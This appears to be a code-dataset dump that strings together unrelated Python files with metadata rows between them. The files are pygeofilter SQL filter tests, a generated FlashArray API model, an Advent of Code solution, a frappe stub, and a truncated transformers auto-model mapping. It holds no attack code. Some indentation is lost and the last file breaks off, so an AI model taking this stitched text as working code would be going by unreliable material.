print("Value of %s evaluable immediately after initialization "%varname, ns[varname].value(), sum_arr.arrsum.sum.data())
print()
assert (output.data().sum()==ns[varname].value()).all()
# sum_arr.arrsum.arr(var_arr.vararray)
# sum_arr.exposeEvaluable(var_arr.vararray)
# print(sum_arr.arrsum.accumulated.data())
print("Change value of var1 variable to 10")
ns['var1'].set(10)
print('Data:', output.data(), output.data().sum())
ns[varname].dump()
print("Sum should now be ", np.sum(var_arr.vararray.points.data()))
print("Check the value %s of evaluable now: "%varname, ns['out'].value(), sum_arr.arrsum.sum.data())
assert (output.data().sum()==ns[varname].value()).all()
print()
ns.printparameters()
if __name__ == "__main__":
run_unittests(globals())
| 34.510638
| 124
| 0.668311
|
4a0a1cad4874fd2bdac1e138eceb5a27b6a7ac30
| 7,191
|
py
|
Python
|
tests/test_sql/test_evaluate.py
|
rsmith013/pygeofilter
|
cf3ac068d37a0895a3f88e2aa3a7d375911acc0b
|
[
"MIT"
] | null | null | null |
tests/test_sql/test_evaluate.py
|
rsmith013/pygeofilter
|
cf3ac068d37a0895a3f88e2aa3a7d375911acc0b
|
[
"MIT"
] | null | null | null |
tests/test_sql/test_evaluate.py
|
rsmith013/pygeofilter
|
cf3ac068d37a0895a3f88e2aa3a7d375911acc0b
|
[
"MIT"
] | null | null | null |
from datetime import date, datetime
from pygeofilter.backends.sql import to_sql_where
from pygeofilter.parsers.ecql import parse
from osgeo import ogr
import pytest
ogr.UseExceptions()
@pytest.fixture
def data():
driver = ogr.GetDriverByName('MEMORY')
source = driver.CreateDataSource('data')
layer = source.CreateLayer("layer")
id_attr = ogr.FieldDefn("id", ogr.OFTInteger)
layer.CreateField(id_attr)
str_attr = ogr.FieldDefn("str_attr", ogr.OFTString)
layer.CreateField(str_attr)
maybe_str_attr = ogr.FieldDefn("maybe_str_attr", ogr.OFTString)
layer.CreateField(maybe_str_attr)
int_attr = ogr.FieldDefn("int_attr", ogr.OFTInteger)
layer.CreateField(int_attr)
float_attr = ogr.FieldDefn("float_attr", ogr.OFTReal)
layer.CreateField(float_attr)
date_attr = ogr.FieldDefn("date_attr", ogr.OFTDate)
layer.CreateField(date_attr)
datetime_attr = ogr.FieldDefn("datetime_attr", ogr.OFTDateTime)
layer.CreateField(datetime_attr)
feature_def = layer.GetLayerDefn()
feature = ogr.Feature(feature_def)
feature.SetGeometry(ogr.CreateGeometryFromWkt("POINT (1 1)"))
feature.SetField("id", 0)
feature.SetField("str_attr", "this is a test")
feature.SetField("maybe_str_attr", None)
feature.SetField("int_attr", 5)
feature.SetField("float_attr", 5.5)
feature.SetField("date_attr", "2010-01-01")
feature.SetField("datetime_attr", "2010-01-01T00:00:00Z")
layer.CreateFeature(feature)
feature = None
feature_def = layer.GetLayerDefn()
feature = ogr.Feature(feature_def)
feature.SetGeometry(ogr.CreateGeometryFromWkt("POINT (2 2)"))
feature.SetField("id", 1)
feature.SetField("str_attr", "this is another test")
feature.SetField("maybe_str_attr", 'not null')
feature.SetField("int_attr", 8)
feature.SetField("float_attr", 8.5)
feature.SetField("date_attr", "2010-01-10")
feature.SetField("datetime_attr", "2010-10-01T00:00:00Z")
layer.CreateFeature(feature)
feature = None
return source
FIELD_MAPPING = {
'str_attr': 'str_attr',
'maybe_str_attr': 'maybe_str_attr',
'int_attr': 'int_attr',
'float_attr': 'float_attr',
'date_attr': 'date_attr',
'datetime_attr': 'datetime_attr',
'point_attr': 'GEOMETRY',
}
FUNCTION_MAP = {
'sin': 'sin'
}
def filter_(ast, data):
where = to_sql_where(ast, FIELD_MAPPING, FUNCTION_MAP)
return data.ExecuteSQL(f"""
SELECT id, str_attr, maybe_str_attr, int_attr, float_attr, date_attr, datetime_attr, GEOMETRY
FROM layer
WHERE {where}
""", None, "SQLite")
def test_comparison(data):
result = filter_(parse('int_attr = 5'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('int_attr < 6'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('int_attr > 6'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
result = filter_(parse('int_attr <= 5'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('int_attr >= 8'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
result = filter_(parse('int_attr <> 5'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
def test_combination(data):
result = filter_(parse('int_attr = 5 AND float_attr < 6.0'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('int_attr = 5 AND float_attr < 6.0'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
def test_between(data):
result = filter_(parse('float_attr BETWEEN 4 AND 6'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('int_attr NOT BETWEEN 4 AND 6'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
def test_like(data):
result = filter_(parse('str_attr LIKE \'this is . test\''), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('str_attr LIKE \'this is % test\''), data)
assert result.GetFeatureCount() == 2
result = filter_(parse('str_attr NOT LIKE \'% another test\''), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('str_attr NOT LIKE \'this is . test\''), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
result = filter_(parse('str_attr ILIKE \'THIS IS . TEST\''), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('str_attr ILIKE \'THIS IS % TEST\''), data)
assert result.GetFeatureCount() == 2
def test_in(data):
result = filter_(parse('int_attr IN ( 1, 2, 3, 4, 5 )'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('int_attr NOT IN ( 1, 2, 3, 4, 5 )'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
def test_null(data):
result = filter_(parse('maybe_str_attr IS NULL'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(parse('maybe_str_attr IS NOT NULL'), data)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
# TODO: possible?
# def test_has_attr(data):
# result = filter_(parse('extra_attr EXISTS'), data)
# assert len(result) == 1 and result[0] is data[0]
# result = filter_(parse('extra_attr DOES-NOT-EXIST'), data)
# assert len(result) == 1 and result[0] is data[1]
# def test_temporal(data):
# result = filter_(
# parse('date_attr BEFORE 2010-01-08T00:00:00.00Z'),
# data
# )
# assert len(result) == 1 and result.index[0] == 0
# result = filter_(
# parse('date_attr AFTER 2010-01-08T00:00:00.00+01:00'),
# data
# )
# assert len(result) == 1 and result.index[0] == 1
def test_spatial(data):
result = filter_(
parse('INTERSECTS(point_attr, ENVELOPE (0 1 0 1))'),
data,
)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
result = filter_(
parse('EQUALS(point_attr, POINT(2 2))'),
data,
)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 1
def test_arithmetic(data):
result = filter_(
parse('int_attr = float_attr - 0.5'),
data,
)
assert result.GetFeatureCount() == 2
result = filter_(
parse('int_attr = 5 + 20 / 2 - 10'),
data,
)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
def test_function(data):
result = filter_(
parse('sin(float_attr) BETWEEN -0.75 AND -0.70'),
data,
)
assert result.GetFeatureCount() == 1 and result.GetFeature(0).GetField(0) == 0
| 33.446512
| 101
| 0.664303
|
4a0a20038c2552f31fb5f2c6376d5d8783aee838
| 5,402
|
py
|
Python
|
pypureclient/flasharray/FA_2_5/models/protection_group_get_response.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 14
|
2018-12-07T18:30:27.000Z
|
2022-02-22T09:12:33.000Z
|
pypureclient/flasharray/FA_2_5/models/protection_group_get_response.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 28
|
2019-09-17T21:03:52.000Z
|
2022-03-29T22:07:35.000Z
|
pypureclient/flasharray/FA_2_5/models/protection_group_get_response.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 15
|
2020-06-11T15:50:08.000Z
|
2022-03-21T09:27:25.000Z
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class ProtectionGroupGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'more_items_remaining': 'bool',
'total_item_count': 'int',
'continuation_token': 'str',
'items': 'list[ProtectionGroup]',
'total': 'list[ProtectionGroup]'
}
attribute_map = {
'more_items_remaining': 'more_items_remaining',
'total_item_count': 'total_item_count',
'continuation_token': 'continuation_token',
'items': 'items',
'total': 'total'
}
required_args = {
}
def __init__(
self,
more_items_remaining=None, # type: bool
total_item_count=None, # type: int
continuation_token=None, # type: str
items=None, # type: List[models.ProtectionGroup]
total=None, # type: List[models.ProtectionGroup]
):
"""
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[ProtectionGroup]): Returns a list of all items after filtering. The values are displayed for each name where meaningful. If `total_only=true`, the `items` list will be empty.
total (list[ProtectionGroup]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
"""
if more_items_remaining is not None:
self.more_items_remaining = more_items_remaining
if total_item_count is not None:
self.total_item_count = total_item_count
if continuation_token is not None:
self.continuation_token = continuation_token
if items is not None:
self.items = items
if total is not None:
self.total = total
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ProtectionGroupGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ProtectionGroupGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ProtectionGroupGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 39.720588
| 524
| 0.61903
|
4a0a2287628e420f3fd25e9926104d795ebf2232
| 916
|
py
|
Python
|
valentine/algorithms/match.py
|
delftdata/valentine
|
3be3fcbe91f1a838f21399eeb5e6ec97f4b94e76
|
[
"Apache-2.0"
] | 20
|
2020-11-18T16:10:38.000Z
|
2022-01-26T09:09:54.000Z
|
valentine/algorithms/match.py
|
delftdata/valentine
|
3be3fcbe91f1a838f21399eeb5e6ec97f4b94e76
|
[
"Apache-2.0"
] | 6
|
2021-10-15T11:25:23.000Z
|
2021-11-16T10:21:48.000Z
|
valentine/algorithms/match.py
|
delftdata/valentine
|
3be3fcbe91f1a838f21399eeb5e6ec97f4b94e76
|
[
"Apache-2.0"
] | 4
|
2021-06-07T11:02:04.000Z
|
2021-11-05T21:50:52.000Z
|
class Match:
"""
Class representing a match of two columns target is the one we want to find the matches of, source an other
that exists in the database and the similarity between the two.
NOTE: Use the to_dict method when you want to append a match to a list of matches
"""
def __init__(self, target_table_name: str, target_column_name: str,
source_table_name: str, source_column_name: str,
similarity: float):
self.target_table_name = target_table_name
self.target_column_name = target_column_name
self.source_table_name = source_table_name
self.source_column_name = source_column_name
self.similarity = similarity
@property
def to_dict(self) -> dict:
return {((self.source_table_name, self.source_column_name),
(self.target_table_name, self.target_column_name)): self.similarity}
| 43.619048
| 111
| 0.694323
|
4a0a229a5ef6c6c1c3bf022333c5bfcf2a509f75
| 838
|
py
|
Python
|
Day15/Day15.py
|
wagyourtail/Advent-Of-Code
|
f6b8dc796ef54555c5630453f4011d5b472ac9cc
|
[
"MIT"
] | null | null | null |
Day15/Day15.py
|
wagyourtail/Advent-Of-Code
|
f6b8dc796ef54555c5630453f4011d5b472ac9cc
|
[
"MIT"
] | null | null | null |
Day15/Day15.py
|
wagyourtail/Advent-Of-Code
|
f6b8dc796ef54555c5630453f4011d5b472ac9cc
|
[
"MIT"
] | null | null | null |
def part1(inp):
while len(inp) < 2020:
prev = inp[-1]
for i in range(len(inp) - 2, -1, -1):
if prev == inp[i]:
inp.append(len(inp) - i - 1)
break
else:
inp.append(0)
return inp[-1]
def part2(inp, leng):
a = {}
j = 0
for i in inp[:-1]:
a[i] = j
j += 1
prev = inp[-1]
for i in range(len(inp) - 1, leng - 1):
if prev in a:
sp = prev
prev = i - a[prev]
a[sp] = i
else:
a[prev] = i
prev = 0
return prev
def main():
inputVal = [int(a) for a in "8,11,0,19,1,2".split(",")]
p1 = part2(inputVal[:], 2020)
print(f"Part1: {p1}")
p2 = part2(inputVal, 30000000)
print(f"Part2: {p2}")
if __name__ == "__main__":
main()
| 20.95
| 59
| 0.424821
|
4a0a230543c463bb2d7bb78e6df68268614226f0
| 274
|
py
|
Python
|
one_fm/legal/doctype/legal_investigation_penalty/legal_investigation_penalty.py
|
askmetoo/One-FM
|
c93ed63695a3e62ee8129bd9adf563116b749030
|
[
"MIT"
] | 16
|
2021-06-14T23:56:47.000Z
|
2022-03-22T12:05:06.000Z
|
one_fm/legal/doctype/legal_investigation_penalty/legal_investigation_penalty.py
|
askmetoo/One-FM
|
c93ed63695a3e62ee8129bd9adf563116b749030
|
[
"MIT"
] | 119
|
2020-08-17T16:27:45.000Z
|
2022-03-28T12:42:56.000Z
|
one_fm/legal/doctype/legal_investigation_penalty/legal_investigation_penalty.py
|
askmetoo/One-FM
|
c93ed63695a3e62ee8129bd9adf563116b749030
|
[
"MIT"
] | 12
|
2021-05-16T13:35:40.000Z
|
2022-02-21T12:41:04.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020, omar jaber and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class LegalInvestigationPenalty(Document):
pass
| 24.909091
| 49
| 0.784672
|
4a0a25291003cf3331ade74e4ce91f99a4731e88
| 61
|
py
|
Python
|
code/python/array_add.py
|
evmorov/ruby-coffeescript
|
1c61c5ce351509b210e26feceee6efab0b255442
|
[
"MIT"
] | 29
|
2016-06-15T09:19:18.000Z
|
2022-03-21T14:34:47.000Z
|
code/python/array_add.py
|
evmorov/ruby-coffeescript
|
1c61c5ce351509b210e26feceee6efab0b255442
|
[
"MIT"
] | 7
|
2016-06-16T07:02:43.000Z
|
2020-01-08T21:12:30.000Z
|
code/python/array_add.py
|
evmorov/ruby-coffeescript
|
1c61c5ce351509b210e26feceee6efab0b255442
|
[
"MIT"
] | 7
|
2016-06-15T14:57:46.000Z
|
2021-12-09T17:57:22.000Z
|
arr = []
arr.append('first')
arr.append('second')
print(arr)
| 12.2
| 20
| 0.655738
|
4a0a254d5c5a480bb21531ae5eb0328aee72073a
| 73,675
|
py
|
Python
|
src/transformers/models/auto/modeling_auto.py
|
timpal0l/transformers
|
d86d57faa3b6511c6e4d9139535d77b695b9af8a
|
[
"Apache-2.0"
] | 2
|
2020-11-30T11:30:40.000Z
|
2021-03-26T17:20:33.000Z
|
src/transformers/models/auto/modeling_auto.py
|
timpal0l/transformers
|
d86d57faa3b6511c6e4d9139535d77b695b9af8a
|
[
"Apache-2.0"
] | 1
|
2020-11-12T11:00:12.000Z
|
2020-11-12T11:00:12.000Z
|
src/transformers/models/auto/modeling_auto.py
|
timpal0l/transformers
|
d86d57faa3b6511c6e4d9139535d77b695b9af8a
|
[
"Apache-2.0"
] | 1
|
2020-11-17T02:48:00.000Z
|
2020-11-17T02:48:00.000Z
|
# coding=utf-8
# Copyright 2018 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Auto Model class. """
import warnings
from collections import OrderedDict
from ...configuration_utils import PretrainedConfig
from ...file_utils import add_start_docstrings
from ...utils import logging
# Add modeling imports here
from ..albert.modeling_albert import (
AlbertForMaskedLM,
AlbertForMultipleChoice,
AlbertForPreTraining,
AlbertForQuestionAnswering,
AlbertForSequenceClassification,
AlbertForTokenClassification,
AlbertModel,
)
from ..bart.modeling_bart import (
BartForConditionalGeneration,
BartForQuestionAnswering,
BartForSequenceClassification,
BartModel,
)
from ..bert.modeling_bert import (
BertForMaskedLM,
BertForMultipleChoice,
BertForNextSentencePrediction,
BertForPreTraining,
BertForQuestionAnswering,
BertForSequenceClassification,
BertForTokenClassification,
BertLMHeadModel,
BertModel,
)
from ..bert_generation.modeling_bert_generation import BertGenerationDecoder, BertGenerationEncoder
from ..blenderbot.modeling_blenderbot import BlenderbotForConditionalGeneration
from ..camembert.modeling_camembert import (
CamembertForCausalLM,
CamembertForMaskedLM,
CamembertForMultipleChoice,
CamembertForQuestionAnswering,
CamembertForSequenceClassification,
CamembertForTokenClassification,
CamembertModel,
)
from ..ctrl.modeling_ctrl import CTRLLMHeadModel, CTRLModel
from ..deberta.modeling_deberta import DebertaForSequenceClassification, DebertaModel
from ..distilbert.modeling_distilbert import (
DistilBertForMaskedLM,
DistilBertForMultipleChoice,
DistilBertForQuestionAnswering,
DistilBertForSequenceClassification,
DistilBertForTokenClassification,
DistilBertModel,
)
from ..dpr.modeling_dpr import DPRQuestionEncoder
from ..electra.modeling_electra import (
ElectraForMaskedLM,
ElectraForMultipleChoice,
ElectraForPreTraining,
ElectraForQuestionAnswering,
ElectraForSequenceClassification,
ElectraForTokenClassification,
ElectraModel,
)
from ..encoder_decoder.modeling_encoder_decoder import EncoderDecoderModel
from ..flaubert.modeling_flaubert import (
FlaubertForMultipleChoice,
FlaubertForQuestionAnsweringSimple,
FlaubertForSequenceClassification,
FlaubertForTokenClassification,
FlaubertModel,
FlaubertWithLMHeadModel,
)
from ..fsmt.modeling_fsmt import FSMTForConditionalGeneration, FSMTModel
from ..funnel.modeling_funnel import (
FunnelForMaskedLM,
FunnelForMultipleChoice,
FunnelForPreTraining,
FunnelForQuestionAnswering,
FunnelForSequenceClassification,
FunnelForTokenClassification,
FunnelModel,
)
from ..gpt2.modeling_gpt2 import GPT2ForSequenceClassification, GPT2LMHeadModel, GPT2Model
from ..layoutlm.modeling_layoutlm import LayoutLMForMaskedLM, LayoutLMForTokenClassification, LayoutLMModel
from ..longformer.modeling_longformer import (
LongformerForMaskedLM,
LongformerForMultipleChoice,
LongformerForQuestionAnswering,
LongformerForSequenceClassification,
LongformerForTokenClassification,
LongformerModel,
)
from ..lxmert.modeling_lxmert import LxmertForPreTraining, LxmertForQuestionAnswering, LxmertModel
from ..marian.modeling_marian import MarianMTModel
from ..mbart.modeling_mbart import MBartForConditionalGeneration
from ..mobilebert.modeling_mobilebert import (
MobileBertForMaskedLM,
MobileBertForMultipleChoice,
MobileBertForNextSentencePrediction,
MobileBertForPreTraining,
MobileBertForQuestionAnswering,
MobileBertForSequenceClassification,
MobileBertForTokenClassification,
MobileBertModel,
)
from ..mt5.modeling_mt5 import MT5ForConditionalGeneration, MT5Model
from ..openai.modeling_openai import OpenAIGPTForSequenceClassification, OpenAIGPTLMHeadModel, OpenAIGPTModel
from ..pegasus.modeling_pegasus import PegasusForConditionalGeneration
from ..prophetnet.modeling_prophetnet import ProphetNetForCausalLM, ProphetNetForConditionalGeneration, ProphetNetModel
from ..rag.modeling_rag import ( # noqa: F401 - need to import all RagModels to be in globals() function
RagModel,
RagSequenceForGeneration,
RagTokenForGeneration,
)
from ..reformer.modeling_reformer import (
ReformerForMaskedLM,
ReformerForQuestionAnswering,
ReformerForSequenceClassification,
ReformerModel,
ReformerModelWithLMHead,
)
from ..retribert.modeling_retribert import RetriBertModel
from ..roberta.modeling_roberta import (
RobertaForCausalLM,
RobertaForMaskedLM,
RobertaForMultipleChoice,
RobertaForQuestionAnswering,
RobertaForSequenceClassification,
RobertaForTokenClassification,
RobertaModel,
)
from ..squeezebert.modeling_squeezebert import (
SqueezeBertForMaskedLM,
SqueezeBertForMultipleChoice,
SqueezeBertForQuestionAnswering,
SqueezeBertForSequenceClassification,
SqueezeBertForTokenClassification,
SqueezeBertModel,
)
from ..t5.modeling_t5 import T5ForConditionalGeneration, T5Model
from ..transfo_xl.modeling_transfo_xl import TransfoXLLMHeadModel, TransfoXLModel
from ..xlm.modeling_xlm import (
XLMForMultipleChoice,
XLMForQuestionAnsweringSimple,
XLMForSequenceClassification,
XLMForTokenClassification,
XLMModel,
XLMWithLMHeadModel,
)
from ..xlm_prophetnet.modeling_xlm_prophetnet import (
XLMProphetNetForCausalLM,
XLMProphetNetForConditionalGeneration,
XLMProphetNetModel,
)
from ..xlm_roberta.modeling_xlm_roberta import (
XLMRobertaForCausalLM,
XLMRobertaForMaskedLM,
XLMRobertaForMultipleChoice,
XLMRobertaForQuestionAnswering,
XLMRobertaForSequenceClassification,
XLMRobertaForTokenClassification,
XLMRobertaModel,
)
from ..xlnet.modeling_xlnet import (
XLNetForMultipleChoice,
XLNetForQuestionAnsweringSimple,
XLNetForSequenceClassification,
XLNetForTokenClassification,
XLNetLMHeadModel,
XLNetModel,
)
from .configuration_auto import (
AlbertConfig,
AutoConfig,
BartConfig,
BertConfig,
BertGenerationConfig,
BlenderbotConfig,
CamembertConfig,
CTRLConfig,
DebertaConfig,
DistilBertConfig,
DPRConfig,
ElectraConfig,
EncoderDecoderConfig,
FlaubertConfig,
FSMTConfig,
FunnelConfig,
GPT2Config,
LayoutLMConfig,
LongformerConfig,
LxmertConfig,
MarianConfig,
MBartConfig,
MobileBertConfig,
MT5Config,
OpenAIGPTConfig,
PegasusConfig,
ProphetNetConfig,
ReformerConfig,
RetriBertConfig,
RobertaConfig,
SqueezeBertConfig,
T5Config,
TransfoXLConfig,
XLMConfig,
XLMProphetNetConfig,
XLMRobertaConfig,
XLNetConfig,
replace_list_option_in_docstrings,
)
logger = logging.get_logger(__name__)
MODEL_MAPPING = OrderedDict(
[
# Base model mapping
(RetriBertConfig, RetriBertModel),
(MT5Config, MT5Model),
(T5Config, T5Model),
(DistilBertConfig, DistilBertModel),
(AlbertConfig, AlbertModel),
(CamembertConfig, CamembertModel),
(XLMRobertaConfig, XLMRobertaModel),
(BartConfig, BartModel),
(LongformerConfig, LongformerModel),
(RobertaConfig, RobertaModel),
(LayoutLMConfig, LayoutLMModel),
(SqueezeBertConfig, SqueezeBertModel),
(BertConfig, BertModel),
(OpenAIGPTConfig, OpenAIGPTModel),
(GPT2Config, GPT2Model),
(MobileBertConfig, MobileBertModel),
(TransfoXLConfig, TransfoXLModel),
(XLNetConfig, XLNetModel),
(FlaubertConfig, FlaubertModel),
(FSMTConfig, FSMTModel),
(XLMConfig, XLMModel),
(CTRLConfig, CTRLModel),
(ElectraConfig, ElectraModel),
(ReformerConfig, ReformerModel),
(FunnelConfig, FunnelModel),
(LxmertConfig, LxmertModel),
(BertGenerationConfig, BertGenerationEncoder),
(DebertaConfig, DebertaModel),
(DPRConfig, DPRQuestionEncoder),
(XLMProphetNetConfig, XLMProphetNetModel),
(ProphetNetConfig, ProphetNetModel),
]
)
MODEL_FOR_PRETRAINING_MAPPING = OrderedDict(
[
# Model for pre-training mapping
(LayoutLMConfig, LayoutLMForMaskedLM),
(RetriBertConfig, RetriBertModel),
(T5Config, T5ForConditionalGeneration),
(DistilBertConfig, DistilBertForMaskedLM),
(AlbertConfig, AlbertForPreTraining),
(CamembertConfig, CamembertForMaskedLM),
(XLMRobertaConfig, XLMRobertaForMaskedLM),
(BartConfig, BartForConditionalGeneration),
(FSMTConfig, FSMTForConditionalGeneration),
(LongformerConfig, LongformerForMaskedLM),
(RobertaConfig, RobertaForMaskedLM),
(SqueezeBertConfig, SqueezeBertForMaskedLM),
(BertConfig, BertForPreTraining),
(OpenAIGPTConfig, OpenAIGPTLMHeadModel),
(GPT2Config, GPT2LMHeadModel),
(MobileBertConfig, MobileBertForPreTraining),
(TransfoXLConfig, TransfoXLLMHeadModel),
(XLNetConfig, XLNetLMHeadModel),
(FlaubertConfig, FlaubertWithLMHeadModel),
(XLMConfig, XLMWithLMHeadModel),
(CTRLConfig, CTRLLMHeadModel),
(ElectraConfig, ElectraForPreTraining),
(LxmertConfig, LxmertForPreTraining),
(FunnelConfig, FunnelForPreTraining),
]
)
MODEL_WITH_LM_HEAD_MAPPING = OrderedDict(
[
# Model with LM heads mapping
(LayoutLMConfig, LayoutLMForMaskedLM),
(T5Config, T5ForConditionalGeneration),
(DistilBertConfig, DistilBertForMaskedLM),
(AlbertConfig, AlbertForMaskedLM),
(CamembertConfig, CamembertForMaskedLM),
(XLMRobertaConfig, XLMRobertaForMaskedLM),
(MarianConfig, MarianMTModel),
(FSMTConfig, FSMTForConditionalGeneration),
(BartConfig, BartForConditionalGeneration),
(LongformerConfig, LongformerForMaskedLM),
(RobertaConfig, RobertaForMaskedLM),
(SqueezeBertConfig, SqueezeBertForMaskedLM),
(BertConfig, BertForMaskedLM),
(OpenAIGPTConfig, OpenAIGPTLMHeadModel),
(GPT2Config, GPT2LMHeadModel),
(MobileBertConfig, MobileBertForMaskedLM),
(TransfoXLConfig, TransfoXLLMHeadModel),
(XLNetConfig, XLNetLMHeadModel),
(FlaubertConfig, FlaubertWithLMHeadModel),
(XLMConfig, XLMWithLMHeadModel),
(CTRLConfig, CTRLLMHeadModel),
(ElectraConfig, ElectraForMaskedLM),
(EncoderDecoderConfig, EncoderDecoderModel),
(ReformerConfig, ReformerModelWithLMHead),
(FunnelConfig, FunnelForMaskedLM),
]
)
MODEL_FOR_CAUSAL_LM_MAPPING = OrderedDict(
[
# Model for Causal LM mapping
(CamembertConfig, CamembertForCausalLM),
(XLMRobertaConfig, XLMRobertaForCausalLM),
(RobertaConfig, RobertaForCausalLM),
(BertConfig, BertLMHeadModel),
(OpenAIGPTConfig, OpenAIGPTLMHeadModel),
(GPT2Config, GPT2LMHeadModel),
(TransfoXLConfig, TransfoXLLMHeadModel),
(XLNetConfig, XLNetLMHeadModel),
(
XLMConfig,
XLMWithLMHeadModel,
), # XLM can be MLM and CLM => model should be split similar to BERT; leave here for now
(CTRLConfig, CTRLLMHeadModel),
(ReformerConfig, ReformerModelWithLMHead),
(BertGenerationConfig, BertGenerationDecoder),
(XLMProphetNetConfig, XLMProphetNetForCausalLM),
(ProphetNetConfig, ProphetNetForCausalLM),
]
)
MODEL_FOR_MASKED_LM_MAPPING = OrderedDict(
[
# Model for Masked LM mapping
(LayoutLMConfig, LayoutLMForMaskedLM),
(DistilBertConfig, DistilBertForMaskedLM),
(AlbertConfig, AlbertForMaskedLM),
(BartConfig, BartForConditionalGeneration),
(CamembertConfig, CamembertForMaskedLM),
(XLMRobertaConfig, XLMRobertaForMaskedLM),
(LongformerConfig, LongformerForMaskedLM),
(RobertaConfig, RobertaForMaskedLM),
(SqueezeBertConfig, SqueezeBertForMaskedLM),
(BertConfig, BertForMaskedLM),
(MobileBertConfig, MobileBertForMaskedLM),
(FlaubertConfig, FlaubertWithLMHeadModel),
(XLMConfig, XLMWithLMHeadModel),
(ElectraConfig, ElectraForMaskedLM),
(ReformerConfig, ReformerForMaskedLM),
(FunnelConfig, FunnelForMaskedLM),
]
)
MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING = OrderedDict(
[
# Model for Seq2Seq Causal LM mapping
(MT5Config, MT5ForConditionalGeneration),
(T5Config, T5ForConditionalGeneration),
(PegasusConfig, PegasusForConditionalGeneration),
(MarianConfig, MarianMTModel),
(MBartConfig, MBartForConditionalGeneration),
(BlenderbotConfig, BlenderbotForConditionalGeneration),
(BartConfig, BartForConditionalGeneration),
(FSMTConfig, FSMTForConditionalGeneration),
(EncoderDecoderConfig, EncoderDecoderModel),
(XLMProphetNetConfig, XLMProphetNetForConditionalGeneration),
